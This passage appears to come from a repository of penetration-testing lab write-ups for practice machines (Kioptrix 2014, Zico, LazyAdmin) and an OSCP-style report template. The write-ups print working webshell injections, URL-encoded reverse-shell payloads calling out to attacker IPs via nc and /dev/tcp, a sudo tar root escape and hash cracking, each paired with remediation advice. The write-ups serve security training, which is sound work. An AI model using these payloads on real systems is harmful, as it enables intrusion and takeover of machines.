\"Mozilla/4.0\", and only allows us access if the environment variable is set. In other words, we should be able to bypass the 403 errors on that port if we spoof our user agent! Using the BurpSuite proxy, we can easily spoof our user agent by using the \"Match and Replace\" feature.\r\n\r\n![642f8dd49c6bded553bc000cdfb8ae0c.png](_resources/158fecfa36214df8b5c347483a9c4cec.png)\r\n\r\nWe can now access the web port 8080, and find a reference to `phptax`. 
Clicking the link, we access probably the most interesting system since the start of humanity...\r\n\r\n![e3443fadb57f048d5e1a7ee08931f0a1.png](_resources/74774e33076e4483ac3e35d52b3de13b.png)\r\n\r\nThere are several remote code execution vulnerabilities disclosed for this system, but most don't seem too reliable. We finally end up with [this exploit disclosure](https://www.exploit-db.com/exploits/25849), which boils down to a single web request: `index.php` writes the `newvalue` parameter into the file named by the `field` parameter, so we can drop a PHP backdoor. The exploit itself is slightly unreliable, but we can easily extract and recreate the web request to place the webshell (`newvalue` decodes to `<?php passthru($_GET[cmd]);?>`).\r\n\r\n```\r\nhttp://10.0.0.139:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E\r\n```\r\n\r\nWe can access the webshell at `/phptax/data/rce.php` and inject commands with the `?cmd=` parameter.\r\n\r\n![d237d4993fd0e89bce2bcf7740e76c4f.png](_resources/ab39cd6410114eae9114e8c1aeca9a64.png)\r\n\r\nNice! We now have reliable code execution. We can spawn a reverse shell with the netcat binary as follows (the FIFO construction is needed because FreeBSD's base `nc` has no `-e` option): `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.128 443 >/tmp/f`. 
To prevent shell metacharacters such as `;`, `|`, `&`, `>` and spaces from being misinterpreted as part of the URL, we percent-encode every byte of the payload and visit the following URL to trigger it.\r\n\r\n```\r\nhttp://10.0.0.139:8080/phptax/data/rce.php?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%30%2e%30%2e%31%32%38%20%34%34%33%20%3e%2f%74%6d%70%2f%66\r\n```\r\n\r\nNice, we now have a stable shell as `www`!\r\n\r\n![26bfb20bdf976426fa1da426a6115b7e.png](_resources/dc7495e481304f8991d3f2b205ed49f3.png)\r\n\r\n##### Severity\r\n\r\n`High` - Any user with access to the network this machine is on may be able to read sensitive information and/or remotely exploit the machine.\r\n\r\n##### Remediation\r\n\r\n- Don't rely on the User-Agent header, or any other client-supplied header, as an access control.\r\n- Discontinue or update the `pChart` application.\r\n- Discontinue or update the `phptax` application.\r\n\r\n##### Proof\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nAs user `www`, we don't find much that is usable for privilege escalation. Since the system is quite old, let's look for kernel exploits.\r\n\r\n```\r\n$ uname -a\r\nFreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64\r\n```\r\n\r\nLooking for exploits for FreeBSD 9, we stumble upon [this exploit](https://www.exploit-db.com/exploits/28718), which applies to FreeBSD 9.0. Let's try it out! We grab the source code, transfer it to the target system using `nc`, and compile it with `gcc` on the target itself (to avoid cross-compilation issues). Running the binary drops us into a root shell! 
Awesome!\r\n\r\n##### Severity\r\n\r\n`Critical` - Any user on the machine may execute this or similar exploits to gain full control over the machine.\r\n\r\n##### Remediation\r\n\r\nPatch the operating system to the latest - or at least a more recent - version of FreeBSD.\r\n\r\n##### Proof\r\n\r\n![a95dfa6c8b04130cc0e035e71de295b1.png](_resources/2e4416476b68490a8d24e3d7ef51433f.png)\r\n\r\n### Miscellaneous notes\r\n\r\nThe author implemented a nice monitoring feature on the box, confronting you with how much noise you make. I generated 35 \"level 6\" alerts, which would otherwise have had me blocked for 10 minutes each. Phew!\r\n\r\n![31ca80e6a99a0c083eb47f97fb183b07.png](_resources/d980375a0a284cd699d453a2bb24acbb.png)\r\n\r\n## System IP 10.0.100.105 (Zico)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.100.105    |\r\n| Hostname          | Zico            |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nTo exploit this machine we identified `phpLiteAdmin v1.9.3`, protected only by its default password, which allows us to write files with attacker-controlled content into the web root. We exploit this to write a webshell, which grants us command execution on the server. 
To escalate our privileges, we abuse our sudo rights on the `tar` binary to spawn an interactive shell as root.\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\nPORT      STATE SERVICE REASON          VERSION\r\n22/tcp    open  ssh     syn-ack ttl 128 OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\r\n| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98r\r\nbT0JW6+Wqa7v0K+N82xf87fVkJcXAuU/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe\r\n9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk\r\n2MHCgxkXl5G/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO/a6T/eQAAAIEAlsW/i/dUuFbRVO2zaAKwL/CFWT19Al7+njszC5FCJ2degg\r\nmF/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p\r\n9x6LxwsDw=\r\n|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\r\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn/OMDgb\r\nf2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6b\r\niJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM\r\n0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat\r\n|   256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\r\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2AT\r\nokB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=\r\n80/tcp    open  http    syn-ack ttl 128 Apache httpd 2.2.22 ((Ubuntu))\r\n| http-methods:\r\n|_  Supported Methods: GET HEAD POST OPTIONS\r\n|_http-server-header: Apache/2.2.22 (Ubuntu)\r\n|_http-title: Zico's Shop\r\n111/tcp   open  rpcbind syn-ack ttl 128 2-4 (RPC 
#100000)\r\n39881/tcp open  status  syn-ack ttl 128 1 (RPC #100024)\r\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN \r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\r\n    inet 127.0.0.1/8 scope host lo\r\n    inet6 ::1/128 scope host \r\n       valid_lft forever preferred_lft forever\r\n2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000\r\n    link/ether 00:0c:29:e2:b0:d1 brd ff:ff:ff:ff:ff:ff\r\n    inet 10.0.100.105/24 brd 10.0.100.255 scope global eth0\r\n    inet6 fe80::20c:29ff:fee2:b0d1/64 scope link \r\n       valid_lft forever preferred_lft forever\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\nzico:sWfCsfJSPV9H3AmQzw8\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds a handful of ports open, of which SSH and HTTP are most notable. Starting with the HTTP server, we can enumerate several pages and directories on the server.\r\n\r\n```\r\n# gobuster dir -u http://10.0.100.105/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -o gobuster.out\r\n[...]\r\n/index (Status: 200)\r\n/index.html (Status: 200)\r\n/img (Status: 301)\r\n/tools (Status: 200)\r\n/tools.html (Status: 200)\r\n/view (Status: 200)\r\n/view.php (Status: 200)\r\n/css (Status: 301)\r\n/js (Status: 301)\r\n/vendor (Status: 301)\r\n/package (Status: 200)\r\n/LICENSE (Status: 200)\r\n/less (Status: 301)\r\n/server-status (Status: 403)\r\n/dbadmin (Status: 301)\r\n```\r\n\r\nThe directory `/dbadmin` looks interesting. It has directory listing enabled, which shows us that `test_db.php` exists in that directory. Here, we can login with a default password of `admin` to find `phpLiteAdmin v1.9.3`. 
This system has a [known vulnerability](https://www.exploit-db.com/exploits/24044): the database file can be given an arbitrary name and location, and SQLite stores the `CREATE TABLE` statement verbatim inside that file. A database named `something.php` whose schema contains a PHP tag therefore becomes a script that the web server executes when it is requested.\r\n\r\nTo exploit this vulnerability, we create a new database called `hack.php`, and populate this database with one table that has one column. We configure this column to have the following default value:\r\n\r\n```\r\n<?php echo system($_GET[\"cmd\"]);?>\r\n```\r\n\r\n> Note the double quotes! Single quotes don't work because the payload is already embedded in single quotes by the phpLiteAdmin application.\r\n\r\nIn the database settings, we see that our simple webshell is written to `/usr/databases/hack.php`. Unfortunately, that directory is outside the web root, so we cannot reach the file over HTTP. Renaming the database lets us specify a new path, in this case `cmd2.php` inside the web-accessible `/dbadmin` directory.\r\n\r\n![53050bc09b2c873bb4e6146f335fb1e5.png](_resources/dedb017ab57246aab374a65165e16d64.png)\r\n\r\nLooking at the directory listing in `/dbadmin`, it seems to have been written correctly! Now we can visit our page to see if the webshell works correctly.\r\n\r\n```\r\n# curl http://10.0.100.105/dbadmin/cmd2.php?cmd=id --output -\r\nWtable11CREATE TABLE '1' ('e' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n```\r\n\r\nThe output is the raw SQLite file (the bytes before `CREATE TABLE` are the `sqlite_master` record) with our PHP tag replaced by the output of `id`, so our command was interpreted by PHP. Awesome, we have command execution. 
We send the following request.\r\n```\r\n# curl --output - http://10.0.100.105/dbadmin/cmd2.php?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%31%30%30%2e%31%30%38%2f%34%34%33%20%30%3e%26%31%27\r\n```\r\n\r\n> This is the below in URL-encoded format.\r\n> \r\n> ```\r\n> bash -c 'bash -i >& /dev/tcp/10.0.100.108/443 0>&1'\r\n> ```\r\n\r\nWe now get a shell back as `www-data` on our listener.\r\n\r\n##### Severity\r\n\r\n`High` - An attacker with connectivity to the machine may guess the credentials for `phpLiteAdmin` and use the known vulnerability in this system to gain command execution on the machine.\r\n\r\n##### Remediation\r\n\r\n- Change the default password for `phpLiteAdmin`.\r\n- Limit access to the database where possible.\r\n\r\n##### Proof\r\n\r\n![9803287060e167bedf64c355ce888f98.png](_resources/d77016f6a7eb4770a8c82f92392d9ef7.png)\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nAs `www-data` we have read access to most of Zico's home folder. 
It looks like he is experimenting with several content management systems.\r\n\r\n```\r\nwww-data@zico:/home/zico$ ls -la\r\nls -la\r\ntotal 9244\r\ndrwxr-xr-x  6 zico zico    4096 Jun 19  2017 .\r\ndrwxr-xr-x  3 root root    4096 Jun  8  2017 ..\r\n-rw-------  1 zico zico     912 Jun 19  2017 .bash_history\r\n-rw-r--r--  1 zico zico     220 Jun  8  2017 .bash_logout\r\n-rw-r--r--  1 zico zico    3486 Jun  8  2017 .bashrc\r\n-rw-r--r--  1 zico zico     675 Jun  8  2017 .profile\r\ndrw-------  2 zico zico    4096 Jun  8  2017 .ssh\r\n-rw-------  1 zico zico    3509 Jun 19  2017 .viminfo\r\n-rw-rw-r--  1 zico zico  504646 Jun 14  2017 bootstrap.zip\r\ndrwxrwxr-x 18 zico zico    4096 Jun 19  2017 joomla\r\ndrwxrwxr-x  6 zico zico    4096 Aug 19  2016 startbootstrap-business-casual-gh-pages\r\n-rw-rw-r--  1 zico zico      61 Jun 19  2017 to_do.txt\r\ndrwxr-xr-x  5 zico zico    4096 Jun 19  2017 wordpress\r\n-rw-rw-r--  1 zico zico 8901913 Jun 19  2017 wordpress-4.8.zip\r\n-rw-rw-r--  1 zico zico    1194 Jun  8  2017 zico-history.tar.gz\r\n```\r\n\r\nInspecting the files, we find database credentials in `wp-config.php` in the Wordpress directory.\r\n\r\n```\r\n$ cat wp-config.php\r\n<?php\r\n[...]\r\n// ** MySQL settings - You can get this info from your web host ** //\r\n/** The name of the database for WordPress */\r\ndefine('DB_NAME', 'zico');\r\n\r\n/** MySQL database username */\r\ndefine('DB_USER', 'zico');\r\n\r\n/** MySQL database password */\r\ndefine('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');\r\n\r\n/** MySQL hostname */\r\ndefine('DB_HOST', 'zico');\r\n\r\n/** Database Charset to use in creating database tables. */\r\ndefine('DB_CHARSET', 'utf8');\r\n\r\n/** The Database Collate type. Don't change this if in doubt. */\r\ndefine('DB_COLLATE', '');\r\n```\r\n\r\nChecking for credential re-use, we try to login to SSH with the credentials `zico:sWfCsfJSPV9H3AmQzw8`. 
It works, and we get a shell as Zico!\r\n\r\n![573127717a56050e7ffe4a46c0466022.png](_resources/4febeff1e4004089a5034bedfe14517d.png)\r\n\r\nRunning `sudo -l` to review Zico's sudo permissions, we find that we can execute both `tar` and `zip` as root. That's interesting! Both binaries should allow us to read files as root, but we are of course interested in gaining a full root shell.\r\n\r\n```\r\n$ sudo -l\r\nMatching Defaults entries for zico on this host:\r\n    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\r\n\r\nUser zico may run the following commands on this host:\r\n    (root) NOPASSWD: /bin/tar\r\n    (root) NOPASSWD: /usr/bin/zip\r\n\r\n```\r\n\r\nLuckily, [this page](https://gtfobins.github.io/gtfobins/tar/#sudo) lists how we can (ab)use our sudo permissions on the `tar` binary to spawn a full root shell. For this, we simply have to run the following command.\r\n\r\n```\r\nsudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\r\n```\r\n\r\nRunning this command we instantly get dropped into a root shell, giving us full access to the system.\r\n\r\n##### Severity\r\n\r\n`Medium` - Anyone with access to Zico's account may abuse these privileges to gain full control over the machine.\r\n\r\n##### Remediation\r\n\r\n- Restrict read access to sensitive files such as the Wordpress configuration file on a need-to-know basis.\r\n- Limit (sudo) privileges based on the principle of least privilege.\r\n- Restrict sudo privileges for binaries that allow privilege escalation, consider using POSIX capabilities instead.\r\n\r\n##### Proof\r\n\r\n![74f94c93d6915e7729c226b54f251707.png](_resources/78fa26ae3e3249a3957c46f2c205d667.png)\r\n\r\n### Miscellaneous notes\r\n\r\nThere are more vulnerabilities on the system than those listed above. Firstly, the `/view.php` page on the webserver has the `?page=` parameter that loads a webpage to show. 
As we can prove by entering e.g. `?page=../../var/www/index.html`, this parameter is vulnerable to local file inclusion. However, we don't seem to be able to access any additional sensitive files at this point because of the limited permissions of user `www-data`.\r\n\r\nAdditionally, we find two hashes in the `test_users` database, which we can access through `phpLiteAdmin`.\r\n\r\n![2fb0b9e0c7062e2ab12c33c227f68b46.png](_resources/0089524c21be445299eeb07d21069283.png)\r\n\r\nBoth hashes are unsalted MD5 and crack instantly against a widely available wordlist. However, neither password is valid for any user on the machine.\r\n\r\n```\r\n# john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5\r\nUsing default input encoding: UTF-8\r\nLoaded 2 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])\r\nWarning: no OpenMP support for this hash type, consider --fork=8\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\nzico2215@        (?)\r\n34kroot34        (?)\r\n2g 0:00:00:00 DONE (2020-05-04 04:17) 3.508g/s 21989Kp/s 21989Kc/s 26377KC/s 34mush..34greenboot\r\n```\r\n\r\n## System IP 10.0.100.107 (LazyAdmin)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.100.107    |\r\n| Hostname          | LazyAdmin       |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nOn this machine, we find an exposed SMB share which allows us to anonymously read several files, including a file containing a password and a PHP configuration file (`wp-config.php`) which contains the database password. Since the latter also hints at a username, we can combine the two to sign into the SSH server. 
To escalate our privileges, we utilize overly broad `sudo` rights to grant ourselves a root shell.\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\n# nmap -p- --min-rate 1000 -sV 10.0.100.107\r\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 05:10 EDT\r\nNmap scan report for 10.0.100.107\r\nHost is up (0.0046s latency).\r\nNot shown: 65529 closed ports\r\nPORT     STATE SERVICE     VERSION\r\n22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\r\n80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))\r\n139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n3306/tcp open  mysql       MySQL (unauthorized)\r\n6667/tcp open  irc         InspIRCd\r\nMAC Address: 00:0C:29:80:C7:69 (VMware)\r\nService Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\nlo: 127.0.0.1\r\neth0: 10.0.100.107\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\ntogie:12345\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds several ports open. Looking at the web server first, we find several directories that may be of interest.\r\n\r\n```\r\n# gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php\r\n[...]\r\n/index.html (Status: 200)\r\n/info.php (Status: 200)\r\n/wordpress (Status: 301)\r\n/test (Status: 301)\r\n/wp (Status: 301)\r\n/apache (Status: 301)\r\n/old (Status: 301)\r\n/javascript (Status: 301)\r\n/phpmyadmin (Status: 301)\r\n```\r\n\r\nWe find a Wordpress instance at `/wordpress` and a login page for PHPMyAdmin at `/phpmyadmin`. 
Unfortunately, the Wordpress instance doesn't seem to contain any vulnerable plugins, and we don't have any creds for MySQL to login to the DB.\r\n\r\n```\r\nwpscan --plugins-detection aggressive -e ap --url http://10.0.100.107/wordpress/\r\n# No notable results\r\n```\r\n\r\nWe continue our enumeration with SMB. Running `smbclient -L 10.0.100.107` returns three shares, among which the non-default and hidden share `share$`. Let's see if we can connect to that!\r\n\r\n```\r\n# smbclient //10.0.100.107/share$\r\nEnter WORKGROUP\\root's password: \r\nTry \"help\" to get a list of possible commands.\r\nsmb: \\> dir\r\n  .                                   D        0  Tue Aug 15 07:05:52 2017\r\n  ..                                  D        0  Mon Aug 14 08:34:47 2017\r\n  wordpress                           D        0  Tue Aug 15 07:21:08 2017\r\n  Backnode_files                      D        0  Mon Aug 14 08:08:26 2017\r\n  wp                                  D        0  Tue Aug 15 06:51:23 2017\r\n  deets.txt                           N      139  Mon Aug 14 08:20:05 2017\r\n  robots.txt                          N       92  Mon Aug 14 08:36:14 2017\r\n  todolist.txt                        N       79  Mon Aug 14 08:39:56 2017\r\n  apache                              D        0  Mon Aug 14 08:35:19 2017\r\n  index.html                          N    36072  Sun Aug  6 01:02:15 2017\r\n  info.php                            N       20  Tue Aug 15 06:55:19 2017\r\n  test                                D        0  Mon Aug 14 08:35:10 2017\r\n  old                                 D        0  Mon Aug 14 08:35:13 2017\r\n\r\n                3029776 blocks of size 1024. 1404884 blocks available\r\n```\r\n\r\nNice, we have a listing of the files hosted on the web server. Very interesting! Unfortunately, we cannot put a webshell through `put`, but we can pull interesting files and inspect them. 
The file `deets.txt` contains a password of `12345`, but we're not sure what the account is or who it is for. Further, we get some database credentials from the Wordpress configuration.\r\n\r\n```php\r\n# cat wp-config.php\r\n<?php\r\n[...]\r\n\r\n// ** MySQL settings - You can get this info from your web host ** //\r\n/** The name of the database for WordPress */\r\ndefine('DB_NAME', 'wordpress');\r\n\r\n/** MySQL database username */\r\ndefine('DB_USER', 'Admin');\r\n\r\n/** MySQL database password */\r\ndefine('DB_PASSWORD', 'TogieMYSQL12345^^');\r\n\r\n/** MySQL hostname */\r\ndefine('DB_HOST', 'localhost');\r\n```\r\n\r\nUsing these credentials, we can successfully log in to PHPMyAdmin. Unfortunately, this version does not appear to be vulnerable, and the `Admin` account cannot reach any tables of interest.\r\n\r\n![915f50888d0e04ae85ae7582e06fcaf9.png](_resources/e054884fa6084498bc1ab532725145a5.png)\r\n\r\nThe password itself, however, discloses a likely username, 'Togie'. Combining that with the password we found before, we try `togie:12345` on SSH. 
It works!\r\n\r\n> Since we gained shell access at this point, I did not look at the IRC port that is open any further.\r\n\r\n##### Severity\r\n\r\n`Critical` - Anyone with connectivity to the target machine can gain access to sensitive files through the exposed share, and potentially guess or bruteforce the weak credentials to gain SSH access to the machine.\r\n\r\n##### Remediation\r\n\r\n- Choose stronger passwords for services, especially external services such as SSH.\r\n- Limit (database) account privileges according to least privilege.\r\n- Limit network access to SSH and MySQL if remote access to these ports is not required.\r\n\r\n##### Proof\r\n\r\n![79550bc5070dbaccbc95e0795d41a50f.png](_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png)\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nFrom the last screenshot (`id`), we notice we are in the `sudo` group. Running `sudo -l` and specifying the password of 12345 shows us that we can run *all* commands as root, which means we can trivially escalate our privileges by running `sudo su`!\r\n\r\n##### Severity\r\n\r\n`High` - Anyone with access to the `sudo` group or similar privileges in the `sudoers` file can trivially gain full control over the system.\r\n\r\n##### Remediation\r\n\r\nLimit `sudo` privileges on a least-privilege basis.\r\n\r\n##### Proof\r\n\r\n![6b320de16f8019995f35475af9004dd2.png](_resources/e6f2888300044268a027062aa4973311.png)"
  },
  {
    "path": "Lab Report template.md",
    "content": "# Offensive Security - Penetration Test Report for PWK Internal Labs\r\n\r\n<!-- Insert your details here -->\r\n[email@email.email]\r\nOSID: [OS-XXXXX]\r\n[Date]\r\n\r\n# Outline\r\n## Introduction\r\n\r\nThe Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.\r\n\r\n## Objective\r\n\r\nThe objective of this assessment is to perform an internal penetration test against the Offensive Security Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.\r\n\r\n## Requirements\r\n\r\nThe student will be required to fill out this penetration testing report fully and to include the following sections:\r\n\r\n- Overall High-Level Summary and Recommendations (non-technical)\r\n- Methodology walkthrough and detailed outline of steps taken\r\n- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable\r\n- Any additional items that were not included\r\n\r\n# High-Level Summary\r\n\r\nThe author of this report was tasked with performing an internal penetration test towards the Offensive Security Lab environment. 
An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Lab systems – including but not limited to the THINC.local domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security.\r\n\r\nDuring the assessment, several alarming vulnerabilities were identified on Offensive Security’s networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were successfully compromised, granting full control over every system in the network. These systems, as well as a brief description of how access was obtained, are listed in the section below.\r\n\r\n## Overview of Compromised Machines\r\n\r\nIt should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.\r\n\r\n<!-- Update the below sections with the right subnets, hosts, and a brief description of the initial exploited vulnerability -->\r\n**Public Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n**Other Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n**Other Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n**Other Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n## Recommendations\r\n\r\nIt is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. 
For each application, patching recommendations are provided.\r\n\r\nOne thing to note is that these systems require frequent patching and, once patched, should remain on a regular patch program to protect against additional vulnerabilities that are discovered at a later date.\r\n\r\n# Methodologies\r\n\r\nA widely adopted approach to performing penetration testing was utilized during the tests to assess how well the Offensive Security Lab environments are secured.\r\nBelow, a breakdown of the applied methodology is provided. \r\n\r\n## Information Gathering\r\n\r\nThe information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the lab network. The following IP ranges were in scope:\r\n\r\n<!-- Update the list of subnets -->\r\n- The 'Public' subnet: X.X.X.X/24\r\n- Another subnet: X.X.X.X/24\r\n\r\nAs part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.\r\n\r\n## Penetration\r\n\r\n<!-- Update this paragraph with the appropriate amount of compromised machines -->\r\nThe penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **67** systems were successfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.\r\n\r\n## Maintaining Access\r\n\r\nMaintaining access to a system is important to attackers: ensuring that access to a system can be regained after it has been exploited is invaluable.\r\nThe 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. 
Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.\r\n\r\n## Lateral Movement\r\n\r\nAs part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.\r\n\r\n## House Cleaning\r\n\r\nThe 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed.\r\nOften fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.\r\nEnsuring that no remnants of our penetration test are left over is important.\r\n\r\nAfter all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system.\r\n\r\n# Exploitation Details: Public Subnet (X.X.X.X/24)\r\n\r\n<!-- Insert machine write-ups from .md template here -->\r\n\r\n# Exploitation Details: Public Subnet (X.X.X.X/24)\r\n\r\n<!-- Insert machine write-ups from .md template here -->\r\n\r\n# Appendix A - Lab Exercises\r\n\r\n<!-- Insert your notes here -->\r\n\r\n# Appendix B - Compromised Credentials\r\n<!-- Optional, you can dump the credentials that you harvested in this chapter -->\r\nAs part of the engagement, several sets of credentials were found on compromised machines. Some credentials were found in hashed form and cracked, indicating the weakness of these credentials. For the sake of full disclosure, these credentials are disclosed below. 
Note that they should be rotated as soon as possible.\r\n\r\n## Personal accounts\r\n```plaintext\r\nCREDENTIALS:HERE\r\n```\r\n\r\n## Non-personal accounts\r\n```plaintext\r\nCREDENTIALS:HERE\r\n```"
  },
  {
    "path": "Machine template.md",
